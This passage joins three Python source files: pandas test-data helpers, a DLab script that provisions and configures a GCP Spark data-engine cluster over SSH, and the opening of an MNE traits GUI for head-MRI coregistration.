index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None) # noqa: PDF010
cython_table = pd.core.common._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from com._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
|
dataengine_configure.py
|
#!/usr/bin/python
# *****************************************************************************
#
# Copyright (c) 2016, EPAM SYSTEMS INC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ******************************************************************************
import json
import time
from fabric.api import *
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import sys
import os
import uuid
import logging
from Crypto.PublicKey import RSA
import multiprocessing
def configure_slave(slave_number, data_engine):
slave_name = data_engine['slave_node_name'] + '{}'.format(slave_number + 1)
slave_hostname = GCPMeta().get_private_ip_address(slave_name)
try:
logging.info('[CREATING DLAB SSH USER ON SLAVE NODE]')
print('[CREATING DLAB SSH USER ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format \
(slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to create ssh user on slave.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON SLAVE NODE]')
logging.info('[INSTALLING USERs KEY ON SLAVE NODE]')
additional_config = {"user_keyname": os.environ['edge_user_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
append_result("Failed installing users key")
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install ssh user key on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON SLAVE NODE]')
print('[CONFIGURE PROXY ON ON SLAVE NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(slave_hostname, slave_name, keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure proxy on slave.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON SLAVE NODE]')
print('[INSTALLING PREREQUISITES ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --user {} --region {}". \
format(slave_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'])
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
append_result("Failed installing apps: apt & pip.", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install prerequisites on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE SLAVE NODE {}]'.format(slave + 1))
print('[CONFIGURE SLAVE NODE {}]'.format(slave + 1))
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} --scala_version {} --r_mirror {} --master_ip {} --node_type {}". \
format(slave_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'slave')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
append_result("Failed configuring slave node", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure slave node.", str(err))
sys.exit(1)
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.INFO,
filename=local_log_filepath)
try:
print('Generating infrastructure names and tags')
data_engine = dict()
data_engine['service_base_name'] = (os.environ['conf_service_base_name']).lower().replace('_', '-')
data_engine['edge_user_name'] = (os.environ['edge_user_name']).lower().replace('_', '-')
data_engine['region'] = os.environ['gcp_region']
data_engine['zone'] = os.environ['gcp_zone']
try:
if os.environ['gcp_vpc_name'] == '':
raise KeyError
else:
data_engine['vpc_name'] = os.environ['gcp_vpc_name']
except KeyError:
data_engine['vpc_name'] = '{}-ssn-vpc'.format(data_engine['service_base_name'])
try:
data_engine['exploratory_name'] = (os.environ['exploratory_name']).lower().replace('_', '-')
except:
data_engine['exploratory_name'] = ''
try:
data_engine['computational_name'] = os.environ['computational_name'].lower().replace('_', '-')
except:
data_engine['computational_name'] = ''
data_engine['subnet_name'] = '{0}-{1}-subnet'.format(data_engine['service_base_name'],
data_engine['edge_user_name'])
data_engine['master_size'] = os.environ['gcp_dataengine_master_size']
data_engine['slave_size'] = os.environ['gcp_dataengine_slave_size']
data_engine['key_name'] = os.environ['conf_key_name']
data_engine['ssh_key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], data_engine['key_name'])
data_engine['dataengine_service_account_name'] = '{}-{}-ps'.format(data_engine['service_base_name'],
data_engine['edge_user_name'])
if os.environ['conf_os_family'] == 'debian':
initial_user = 'ubuntu'
sudo_group = 'sudo'
if os.environ['conf_os_family'] == 'redhat':
initial_user = 'ec2-user'
sudo_group = 'wheel'
data_engine['cluster_name'] = data_engine['service_base_name'] + '-' + data_engine['edge_user_name'] + \
'-de-' + data_engine['exploratory_name'] + '-' + \
data_engine['computational_name']
data_engine['master_node_name'] = data_engine['cluster_name'] + '-m'
data_engine['slave_node_name'] = data_engine['cluster_name'] + '-s'
data_engine['instance_count'] = int(os.environ['dataengine_instance_count'])
data_engine['notebook_name'] = os.environ['notebook_instance_name']
data_engine['gpu_accelerator_type'] = 'None'
if os.environ['application'] in ('tensor', 'deeplearning'):
data_engine['gpu_accelerator_type'] = os.environ['gcp_gpu_accelerator_type']
data_engine['network_tag'] = '{0}-{1}-ps'.format(data_engine['service_base_name'],
data_engine['edge_user_name'])
master_node_hostname = GCPMeta().get_private_ip_address(data_engine['master_node_name'])
edge_instance_name = '{0}-{1}-edge'.format(data_engine['service_base_name'],
data_engine['edge_user_name'])
data_engine['dlab_ssh_user'] = os.environ['conf_os_user']
keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
print("Failed to generate variables dictionary.")
append_result("Failed to generate variables dictionary.", str(err))
sys.exit(1)
try:
logging.info('[CREATING DLAB SSH USER ON MASTER NODE]')
print('[CREATING DLAB SSH USER ON MASTER NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format\
(master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to create ssh user on master.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON MASTER NODE]')
logging.info('[INSTALLING USERs KEY ON MASTER NODE]')
additional_config = {"user_keyname": os.environ['edge_user_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
append_result("Failed installing users key")
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install ssh user on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON MASTER NODE]')
print('[CONFIGURE PROXY ON ON MASTER NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(master_node_hostname, data_engine['master_node_name'], keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure proxy on master.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON MASTER NODE]')
print('[INSTALLING PREREQUISITES ON MASTER NODE]')
params = "--hostname {} --keyfile {} --user {} --region {}".\
format(master_node_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'])
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
append_result("Failed installing apps: apt & pip.", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install prerequisites on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE MASTER NODE]')
print('[CONFIGURE MASTER NODE]')
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} --scala_version {} --r_mirror {} --master_ip {} --node_type {}".\
format(master_node_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'master')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
append_result("Failed to configure master node", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
jobs = []
for slave in range(data_engine['instance_count'] - 1):
p = multiprocessing.Process(target=configure_slave, args=(slave, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
logging.info('[SUMMARY]')
print('[SUMMARY]')
print("Service base name: {}".format(data_engine['service_base_name']))
print("Region: {}".format(data_engine['region']))
print("Cluster name: {}".format(data_engine['cluster_name']))
print("Master node shape: {}".format(data_engine['master_size']))
print("Slave node shape: {}".format(data_engine['slave_size']))
print("Instance count: {}".format(str(data_engine['instance_count'])))
with open("/root/result.json", 'w') as result:
res = {"hostname": data_engine['cluster_name'],
"instance_id": data_engine['master_node_name'],
"key_name": data_engine['key_name'],
"Action": "Create new Data Engine"}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
|
_coreg_gui.py
|
"""Traits-based GUI for head-MRI coregistration"""
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
from copy import deepcopy
import os
from ..externals.six.moves import queue
import re
from threading import Thread
import numpy as np
from scipy.spatial.distance import cdist
# allow import without traits
try:
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (error, confirm, warning, OK, YES, information,
FileDialog, GUI)
from traits.api import (Bool, Button, cached_property, DelegatesTo,
Directory, Enum, Float, HasTraits,
HasPrivateTraits, Instance, Int, on_trait_change,
Property, Str)
from traitsui.api import (View, Item, Group, HGroup, VGroup, VGrid,
EnumEditor, Handler, Label, TextEditor)
from traitsui.menu import Action, UndoButton, CancelButton, NoButtons
from tvtk.pyface.scene_editor import SceneEditor
except:
from ..utils import trait_wraith
HasTraits = object
HasPrivateTraits = object
Handler = object
cached_property = trait_wraith
on_trait_change = trait_wraith
MayaviScene = trait_wraith
MlabSceneModel = trait_wraith
Bool = trait_wraith
Button = trait_wraith
DelegatesTo = trait_wraith
Directory = trait_wraith
Enum = trait_wraith
Float = trait_wraith
Instance = trait_wraith
Int = trait_wraith
Property = trait_wraith
Str = trait_wraith
View = trait_wraith
Item = trait_wraith
Group = trait_wraith
HGroup = trait_wraith
VGroup = trait_wraith
VGrid = trait_wraith
EnumEditor = trait_wraith
Label = trait_wraith
TextEditor = trait_wraith
Action = trait_wraith
UndoButton = trait_wraith
CancelButton = trait_wraith
NoButtons = trait_wraith
SceneEditor = trait_wraith
from ..coreg import bem_fname, trans_fname
from ..fiff import FIFF
from ..forward import prepare_bem_model
from ..transforms import (write_trans, read_trans, apply_trans, rotation,
translation, scaling, rotation_angles)
from ..coreg import (fit_matched_points, fit_point_cloud, scale_mri,
_point_cloud_error)
from ..utils import get_subjects_dir, logger
from ._fiducials_gui import MRIHeadWithFiducialsModel, FiducialsPanel
from ._file_traits import (assert_env_set, trans_wildcard, RawSource,
SubjectSelectorPanel)
from ._viewer import defaults, HeadViewController, PointObject, SurfaceObject
laggy_float_editor = TextEditor(auto_set=False, enter_set=True, evaluate=float)
class CoregModel(HasPrivateTraits):
"""Traits object for estimating the head mri transform.
Notes
-----
Transform from head to mri space is modeled with the following steps:
* move the head shape to its nasion position
* rotate the head shape with user defined rotation around its nasion
* move the head shape by user defined translation
* move the head shape origin to the mri nasion
If MRI scaling is enabled,
* the MRI is scaled relative to its origin center (prior to any
transformation of the digitizer head)
Don't sync transforms to anything to prevent them from being recomputed
upon every parameter change.
"""
# data sources
mri = Instance(MRIHeadWithFiducialsModel, ())
hsp = Instance(RawSource, ())
# parameters
n_scale_params = Enum(0, 1, 3, desc="Scale the MRI to better fit the "
"subject's head shape (a new MRI subject will be "
"created with a name specified upon saving)")
scale_x = Float(1, label="Right (X)")
scale_y = Float(1, label="Anterior (Y)")
scale_z = Float(1, label="Superior (Z)")
rot_x = Float(0, label="Right (X)")
rot_y = Float(0, label="Anterior (Y)")
rot_z = Float(0, label="Superior (Z)")
trans_x = Float(0, label="Right (X)")
trans_y = Float(0, label="Anterior (Y)")
trans_z = Float(0, label="Superior (Z)")
# secondary to parameters
scale = Property(depends_on=['n_scale_params', 'scale_x', 'scale_y',
'scale_z'])
has_fid_data = Property(Bool, depends_on=['mri_origin', 'hsp.nasion'],
desc="Required fiducials data is present.")
has_pts_data = Property(Bool, depends_on=['mri.points', 'hsp.points'])
# MRI dependent
mri_origin = Property(depends_on=['mri.nasion', 'scale'],
desc="Coordinates of the scaled MRI's nasion.")
# target transforms
mri_scale_trans = Property(depends_on=['scale'])
head_mri_trans = Property(depends_on=['hsp.nasion', 'rot_x', 'rot_y',
'rot_z', 'trans_x', 'trans_y',
'trans_z', 'mri_origin'],
desc="Transformaiton of the head shape to "
"match the scaled MRI.")
# info
can_save = Property(Bool, depends_on=['head_mri_trans'])
raw_subject = Property(depends_on='hsp.raw_fname', desc="Subject guess "
"based on the raw file name.")
lock_fiducials = DelegatesTo('mri')
# transformed geometry
transformed_mri_points = Property(depends_on=['mri.points',
'mri_scale_trans'])
transformed_hsp_points = Property(depends_on=['hsp.points',
'head_mri_trans'])
transformed_mri_lpa = Property(depends_on=['mri.lpa', 'mri_scale_trans'])
transformed_hsp_lpa = Property(depends_on=['hsp.lpa', 'head_mri_trans'])
transformed_mri_nasion = Property(depends_on=['mri.nasion',
'mri_scale_trans'])
transformed_hsp_nasion = Property(depends_on=['hsp.nasion',
'head_mri_trans'])
transformed_mri_rpa = Property(depends_on=['mri.rpa', 'mri_scale_trans'])
transformed_hsp_rpa = Property(depends_on=['hsp.rpa', 'head_mri_trans'])
# fit properties
lpa_distance = Property(depends_on=['transformed_mri_lpa',
'transformed_hsp_lpa'])
nasion_distance = Property(depends_on=['transformed_mri_nasion',
'transformed_hsp_nasion'])
rpa_distance = Property(depends_on=['transformed_mri_rpa',
'transformed_hsp_rpa'])
point_distance = Property(depends_on=['transformed_mri_points',
'transformed_hsp_points'])
# fit property info strings
fid_eval_str = Property(depends_on=['lpa_distance', 'nasion_distance',
'rpa_distance'])
points_eval_str = Property(depends_on='point_distance')
@cached_property
def _get_can_save(self):
return np.any(self.head_mri_trans != np.eye(4))
@cached_property
def _get_has_pts_data(self):
has = (np.any(self.mri.points) and np.any(self.hsp.points))
return has
@cached_property
def _get_has_fid_data(self):
has = (np.any(self.mri_origin) and np.any(self.hsp.nasion))
return has
@cached_property
def _get_scale(self):
if self.n_scale_params == 0:
return np.array(1)
elif self.n_scale_params == 1:
return np.array(self.scale_x)
else:
return np.array([self.scale_x, self.scale_y, self.scale_z])
@cached_property
def _get_mri_scale_trans(self):
if np.isscalar(self.scale) or self.scale.ndim == 0:
if self.scale == 1:
return np.eye(4)
else:
s = self.scale
return scaling(s, s, s)
else:
return scaling(*self.scale)
@cached_property
def _get_mri_origin(self):
if np.isscalar(self.scale) and self.scale == 1:
return self.mri.nasion
else:
return self.mri.nasion * self.scale
@cached_property
def _get_head_mri_trans(self):
if not self.has_fid_data:
return np.eye(4)
# move hsp so that its nasion becomes the origin
x, y, z = -self.hsp.nasion[0]
trans = translation(x, y, z)
# rotate hsp by rotation parameters
rot = rotation(self.rot_x, self.rot_y, self.rot_z)
trans = np.dot(rot, trans)
# move hsp by translation parameters
transl = translation(self.trans_x, self.trans_y, self.trans_z)
trans = np.dot(transl, trans)
# move the hsp origin(/nasion) to the MRI's nasion
x, y, z = self.mri_origin[0]
tgt_mri_trans = translation(x, y, z)
trans = np.dot(tgt_mri_trans, trans)
return trans
@cached_property
def _get_transformed_mri_points(self):
return apply_trans(self.mri_scale_trans, self.mri.points)
@cached_property
def _get_transformed_mri_lpa(self):
return apply_trans(self.mri_scale_trans, self.mri.lpa)
@cached_property
def _get_transformed_mri_nasion(self):
return apply_trans(self.mri_scale_trans, self.mri.nasion)
@cached_property
def _get_transformed_mri_rpa(self):
return apply_trans(self.mri_scale_trans, self.mri.rpa)
@cached_property
def _get_transformed_hsp_points(self):
return apply_trans(self.head_mri_trans, self.hsp.points)
@cached_property
def _get_transformed_hsp_lpa(self):
return apply_trans(self.head_mri_trans, self.hsp.lpa)
@cached_property
def _get_transformed_hsp_nasion(self):
return apply_trans(self.head_mri_trans, self.hsp.nasion)
@cached_property
def _get_transformed_hsp_rpa(self):
return apply_trans(self.head_mri_trans, self.hsp.rpa)
@cached_property
def _get_lpa_distance(self):
d = np.ravel(self.transformed_mri_lpa - self.transformed_hsp_lpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_nasion_distance(self):
d = np.ravel(self.transformed_mri_nasion - self.transformed_hsp_nasion)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_rpa_distance(self):
d = np.ravel(self.transformed_mri_rpa - self.transformed_hsp_rpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_point_distance(self):
if (len(self.transformed_hsp_points) == 0
or len(self.transformed_mri_points) == 0):
return
dists = cdist(self.transformed_hsp_points, self.transformed_mri_points,
'euclidean')
dists = np.min(dists, 1)
return dists
@cached_property
def _get_fid_eval_str(self):
d = (self.lpa_distance * 1000, self.nasion_distance * 1000,
self.rpa_distance * 1000)
txt = ("Fiducials Error: LPA %.1f mm, NAS %.1f mm, RPA %.1f mm" % d)
return txt
@cached_property
def _get_points_eval_str(self):
if self.point_distance is None:
return ""
av_dist = np.mean(self.point_distance)
return "Average Points Error: %.1f mm" % (av_dist * 1000)
def _get_raw_subject(self):
# subject name guessed based on the raw file name
if '_' in self.hsp.raw_fname:
subject, _ = self.hsp.raw_fname.split('_', 1)
if not subject:
subject = None
else:
subject = None
return subject
@on_trait_change('raw_subject')
def _on_raw_subject_change(self, subject):
if subject in self.mri.subject_source.subjects:
self.mri.subject = subject
elif 'fsaverage' in self.mri.subject_source.subjects:
self.mri.subject = 'fsaverage'
def omit_hsp_points(self, distance=0, reset=False):
"""Exclude head shape points that are far away from the MRI head
Parameters
----------
distance : float
Exclude all points that are further away from the MRI head than
this distance. Previously excluded points are still excluded unless
reset=True is specified. A value of distance <= 0 excludes nothing.
reset : bool
Reset the filter before calculating new omission (default is
False).
"""
distance = float(distance)
if reset:
logger.info("Coregistration: Reset excluded head shape points")
self.hsp.points_filter = None
if distance <= 0:
return
# find the new filter
hsp_pts = self.transformed_hsp_points
mri_pts = self.transformed_mri_points
point_distance = _point_cloud_error(hsp_pts, mri_pts)
new_sub_filter = point_distance <= distance
n_excluded = np.sum(new_sub_filter == False)
logger.info("Coregistration: Excluding %i head shape points with "
"distance >= %.3f m.", n_excluded, distance)
# combine the new filter with the previous filter
old_filter = self.hsp.points_filter
if old_filter is None:
new_filter = new_sub_filter
else:
new_filter = np.ones(len(self.hsp.raw_points), np.bool8)
new_filter[old_filter] = new_sub_filter
# set the filter
self.hsp.points_filter = new_filter
def fit_auricular_points(self):
"Find rotation to fit LPA and RPA"
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
